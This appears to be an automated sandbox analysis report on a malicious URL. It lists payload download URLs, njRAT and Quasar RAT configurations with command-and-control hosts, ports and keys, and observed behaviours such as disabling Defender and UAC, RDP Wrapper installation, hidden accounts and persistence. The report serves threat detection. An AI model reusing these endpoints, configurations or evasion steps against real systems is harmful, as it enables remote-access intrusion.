Analysis
-
max time kernel
250s -
max time network
252s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02-10-2024 06:59
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://152.89.239.119
Resource
win10v2004-20240802-en
General
-
Target
https://152.89.239.119
Malware Config
Extracted
http://152.89.239.119/ngrok.yml
Extracted
http://152.89.239.119/111.jpg
Extracted
http://152.89.239.119/222.jpg
Extracted
http://152.89.239.119/x.jpg
Extracted
http://152.89.239.119/WindowsUpdate.jpg
Extracted
http://152.89.239.119/ngrok.zip
Extracted
http://152.89.239.119/auto-install-hrdp.bat
Extracted
http://152.89.239.119/hrdp/hrdp.zip
Extracted
http://152.89.239.119/hrdp/update.zip
Extracted
http://152.89.239.119/hrdp/autoupdate.zip
Extracted
njrat
0.7d
حوالات
*jYyNjI2LmRkbn*ubmV0:5552
4e0c23218aae421528d2445f98e0e933
-
reg_key
4e0c23218aae421528d2445f98e0e933
-
splitter
|'|'|
Extracted
quasar
1.4.0.0
srlhost
262626.ddns.net:5551
45.61.151.50:5551
qVw3t6gtOwrpZYozK1
-
encryption_key
QfzNbeLbOitDzJWlP0jo
-
install_name
spoolar.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
spooler
-
subdirectory
printer
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Quasar payload 2 IoCs
resource yara_rule behavioral1/files/0x00090000000234b3-484.dat family_quasar behavioral1/memory/4068-514-0x0000000000290000-0x00000000002DE000-memory.dmp family_quasar -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 11 IoCs
flow pid Process 124 4296 powershell.exe 126 2528 powershell.exe 127 2420 powershell.exe 128 4480 powershell.exe 129 2812 powershell.exe 130 1456 powershell.exe 131 3384 powershell.exe 133 4760 powershell.exe 151 5564 powershell.exe 152 5704 powershell.exe 163 4308 cscript.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs
Run Powershell and hide display window.
pid Process 2092 powershell.exe 320 powershell.exe 2092 powershell.exe 3576 powershell.exe 232 powershell.exe 3380 powershell.exe 4296 powershell.exe 2420 powershell.exe 4480 powershell.exe 2812 powershell.exe 1456 powershell.exe 3384 powershell.exe 4760 powershell.exe 5704 powershell.exe 2528 powershell.exe 5564 powershell.exe 392 powershell.exe 1568 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification \??\c:\Windows\System32\Drivers\etc\hosts cmd.exe -
Modifies Windows Firewall 2 TTPs 8 IoCs
pid Process 5612 netsh.exe 3480 netsh.exe 4408 netsh.exe 5856 netsh.exe 4016 netsh.exe 5468 netsh.exe 5812 netsh.exe 1576 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "C:\\Program Files\\RDP Wrapper\\rdpwrap.dll" reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll" RDPWInst.exe -
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 4764 attrib.exe 4044 attrib.exe 4908 attrib.exe 3704 attrib.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation WindowsUpdate.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation winlogin.exe -
Executes dropped EXE 15 IoCs
pid Process 1444 winlogin.exe 3360 WindowsUpdate.exe 4068 srlhost.exe 3300 smhost.exe 2592 RDPWInst.exe 1580 ngrok.exe 380 RDPWInst.exe 1004 RDPWInst.exe 5432 RDPWInst.exe 3168 RDPWInst.exe 5752 RDPWInst.exe 2488 RDPWInst.exe 5932 RDPWInst.exe 5976 RDPWInst.exe 2792 dismhost.exe -
Loads dropped DLL 25 IoCs
pid Process 5392 svchost.exe 5348 svchost.exe 5700 svchost.exe 2472 svchost.exe 692 svchost.exe 5988 svchost.exe 2792 dismhost.exe 2792 dismhost.exe 2792 dismhost.exe 2792 dismhost.exe 2792 dismhost.exe 2792 dismhost.exe 2792 dismhost.exe 2792 dismhost.exe 2792 dismhost.exe 2792 dismhost.exe 2792 dismhost.exe 2792 dismhost.exe 2792 dismhost.exe 2792 dismhost.exe 2792 dismhost.exe 2792 dismhost.exe 2792 dismhost.exe 2792 dismhost.exe 2792 dismhost.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsPowerup = "C:\\ProgramData\\Windata\\srlhost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogo = "C:\\ProgramData\\Windata\\winlogin.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\ProgramData\\Windata\\smhost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdatez = "C:\\ProgramData\\Windata\\WindowsUpdate.exe" reg.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 134 raw.githubusercontent.com 135 raw.githubusercontent.com 157 raw.githubusercontent.com 158 raw.githubusercontent.com 161 raw.githubusercontent.com 163 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 143 ip-api.com -
Modifies WinLogon 2 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\Recovery ReAgentc.exe File opened for modification C:\Windows\system32\Recovery\ReAgent.xml ReAgentc.exe File created C:\Windows\System32\rfxvmt.dll RDPWInst.exe -
Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist\t1 = "0" reg.exe -
Drops file in Program Files directory 33 IoCs
description ioc Process File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File created C:\Program Files\RDP Wrapper\termsrv.dll cmd.exe File created C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\rdpwrap_ini_updater.bat powershell.exe File created C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\re-install.bat powershell.exe File created C:\Program Files\RDP Wrapper\autoupdate.bat powershell.exe File created C:\Program Files\RDP Wrapper\helper\autoupdate__info.txt powershell.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File opened for modification C:\Program Files\RDP Wrapper\helper\autoupdate__info.txt powershell.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\re-install.bat powershell.exe File created C:\Program Files\RDP Wrapper\helper\autoupdate__disable_autorun_on_startup.bat powershell.exe File opened for modification C:\Program Files\RDP Wrapper\helper\autoupdate__disable_autorun_on_startup.bat powershell.exe File created C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat powershell.exe File created C:\Program Files\RDP Wrapper\rdpwrap_new.ini cscript.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini cmd.exe File opened for modification C:\Program Files\RDP Wrapper\termsrv.dll cmd.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini cmd.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\usage.txt powershell.exe File opened for modification C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat powershell.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File created C:\Program Files\RDP Wrapper\RDPWInst.exe cmd.exe File created C:\Program Files\RDP Wrapper\update.zip powershell.exe File created C:\Program Files\RDP Wrapper\autoupdate.zip powershell.exe File opened for modification C:\Program Files\RDP Wrapper\autoupdate.bat powershell.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini cmd.exe File opened for modification C:\Program Files\RDP Wrapper\RDPWInst.exe cmd.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\rdpwrap_ini_updater.bat powershell.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File created C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\usage.txt powershell.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini cmd.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe File opened for modification C:\Windows\Logs\DISM\dism.log Dism.exe File opened for modification C:\Windows\Logs\DISM\dism.log dismhost.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2840 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 20 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WindowsUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language srlhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winlogin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language smhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 804 PING.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1302416131-1437503476-2806442725-1000\{033C8625-5755-4EF4-856F-418F54CBDF1B} msedge.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2736 reg.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 139392.crdownload:SmartScreen msedge.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 804 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 828 schtasks.exe 4500 schtasks.exe 832 schtasks.exe 4416 schtasks.exe 2132 schtasks.exe 2352 schtasks.exe 60 schtasks.exe 3328 schtasks.exe 3192 schtasks.exe 5072 schtasks.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 163 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2208 msedge.exe 2208 msedge.exe 4304 msedge.exe 4304 msedge.exe 1928 identity_helper.exe 1928 identity_helper.exe 4068 msedge.exe 4068 msedge.exe 2092 powershell.exe 2092 powershell.exe 2092 powershell.exe 3576 powershell.exe 3576 powershell.exe 3576 powershell.exe 232 powershell.exe 232 powershell.exe 232 powershell.exe 3380 powershell.exe 3380 powershell.exe 3380 powershell.exe 3324 msedge.exe 3324 msedge.exe 320 powershell.exe 320 powershell.exe 320 powershell.exe 4296 powershell.exe 4296 powershell.exe 4296 powershell.exe 2528 powershell.exe 2528 powershell.exe 2528 powershell.exe 2420 powershell.exe 2420 powershell.exe 2420 powershell.exe 4480 powershell.exe 4480 powershell.exe 4480 powershell.exe 2812 powershell.exe 2812 powershell.exe 2812 powershell.exe 1456 powershell.exe 1456 powershell.exe 1456 powershell.exe 1580 powershell.exe 1580 powershell.exe 1580 powershell.exe 3384 powershell.exe 3384 powershell.exe 3384 powershell.exe 4824 msedge.exe 4824 msedge.exe 4824 msedge.exe 4824 msedge.exe 4760 powershell.exe 4760 powershell.exe 4760 powershell.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 5392 svchost.exe 5392 svchost.exe 5392 svchost.exe 5392 svchost.exe 5564 powershell.exe -
Suspicious behavior: LoadsDriver 9 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 26 IoCs
pid Process 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2092 powershell.exe Token: SeDebugPrivilege 3576 powershell.exe Token: SeDebugPrivilege 232 powershell.exe Token: SeDebugPrivilege 3380 powershell.exe Token: SeDebugPrivilege 320 powershell.exe Token: SeDebugPrivilege 4296 powershell.exe Token: SeDebugPrivilege 2528 powershell.exe Token: SeDebugPrivilege 2420 powershell.exe Token: SeDebugPrivilege 4480 powershell.exe Token: SeDebugPrivilege 2812 powershell.exe Token: SeDebugPrivilege 1456 powershell.exe Token: SeDebugPrivilege 1580 powershell.exe Token: SeDebugPrivilege 3384 powershell.exe Token: SeDebugPrivilege 4760 powershell.exe Token: SeDebugPrivilege 4708 powershell.exe Token: SeDebugPrivilege 2592 RDPWInst.exe Token: SeDebugPrivilege 4068 srlhost.exe Token: SeAuditPrivilege 5392 svchost.exe Token: SeDebugPrivilege 5564 powershell.exe Token: SeDebugPrivilege 5704 powershell.exe Token: SeDebugPrivilege 5308 powershell.exe Token: SeDebugPrivilege 5784 powershell.exe Token: SeDebugPrivilege 3300 smhost.exe Token: SeDebugPrivilege 380 RDPWInst.exe Token: SeAuditPrivilege 5348 svchost.exe Token: SeDebugPrivilege 1004 RDPWInst.exe Token: SeAuditPrivilege 2428 svchost.exe Token: 33 3300 smhost.exe Token: SeIncBasePriorityPrivilege 3300 smhost.exe Token: SeDebugPrivilege 5432 RDPWInst.exe Token: SeAuditPrivilege 5700 svchost.exe Token: SeDebugPrivilege 3168 RDPWInst.exe Token: SeAuditPrivilege 2472 svchost.exe Token: 33 3300 smhost.exe Token: SeIncBasePriorityPrivilege 3300 smhost.exe Token: SeDebugPrivilege 392 powershell.exe Token: SeIncreaseQuotaPrivilege 392 powershell.exe Token: SeSecurityPrivilege 392 powershell.exe Token: SeTakeOwnershipPrivilege 392 powershell.exe Token: SeLoadDriverPrivilege 392 powershell.exe Token: SeSystemProfilePrivilege 392 powershell.exe Token: SeSystemtimePrivilege 392 powershell.exe Token: SeProfSingleProcessPrivilege 392 powershell.exe Token: SeIncBasePriorityPrivilege 392 powershell.exe Token: SeCreatePagefilePrivilege 392 powershell.exe Token: SeBackupPrivilege 392 powershell.exe Token: SeRestorePrivilege 392 powershell.exe Token: SeShutdownPrivilege 392 powershell.exe Token: SeDebugPrivilege 392 powershell.exe Token: SeSystemEnvironmentPrivilege 392 powershell.exe Token: SeRemoteShutdownPrivilege 392 powershell.exe Token: SeUndockPrivilege 392 powershell.exe Token: SeManageVolumePrivilege 392 powershell.exe Token: 33 392 powershell.exe Token: 34 392 powershell.exe Token: 35 392 powershell.exe Token: 36 392 powershell.exe Token: SeDebugPrivilege 5752 RDPWInst.exe Token: SeAuditPrivilege 1072 svchost.exe Token: 33 3300 smhost.exe Token: SeIncBasePriorityPrivilege 3300 smhost.exe Token: SeDebugPrivilege 2488 RDPWInst.exe Token: SeAuditPrivilege 692 svchost.exe Token: SeDebugPrivilege 5932 RDPWInst.exe -
Suspicious use of FindShellTrayWindow 36 IoCs
pid Process 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe -
Suspicious use of SendNotifyMessage 26 IoCs
pid Process 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe 4304 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4068 srlhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4304 wrote to memory of 4996 4304 msedge.exe 82 PID 4304 wrote to memory of 4996 4304 msedge.exe 82 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 3104 4304 msedge.exe 83 PID 4304 wrote to memory of 2208 4304 msedge.exe 84 PID 4304 wrote to memory of 2208 4304 msedge.exe 84 PID 4304 wrote to memory of 5116 4304 msedge.exe 85 PID 4304 wrote to memory of 5116 4304 msedge.exe 85 PID 4304 wrote to memory of 5116 4304 msedge.exe 85 PID 4304 wrote to memory of 5116 4304 msedge.exe 85 PID 4304 wrote to memory of 5116 4304 msedge.exe 85 PID 4304 wrote to memory of 5116 4304 msedge.exe 85 PID 4304 wrote to memory of 5116 4304 msedge.exe 85 PID 4304 wrote to memory of 5116 4304 msedge.exe 85 PID 4304 wrote to memory of 5116 4304 msedge.exe 85 PID 4304 wrote to memory of 5116 4304 msedge.exe 85 PID 4304 wrote to memory of 5116 4304 msedge.exe 85 PID 4304 wrote to memory of 5116 4304 msedge.exe 85 PID 4304 wrote to memory of 5116 4304 msedge.exe 85 PID 4304 wrote to memory of 5116 4304 msedge.exe 85 PID 4304 wrote to memory of 5116 4304 msedge.exe 85 PID 4304 wrote to memory of 5116 4304 msedge.exe 85 PID 4304 wrote to memory of 5116 4304 msedge.exe 85 PID 4304 wrote to memory of 5116 4304 msedge.exe 85 PID 4304 wrote to memory of 5116 4304 msedge.exe 85 PID 4304 wrote to memory of 5116 4304 msedge.exe 85 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 5 IoCs
pid Process 4908 attrib.exe 3704 attrib.exe 5308 attrib.exe 4764 attrib.exe 4044 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://152.89.239.1191⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4304 -
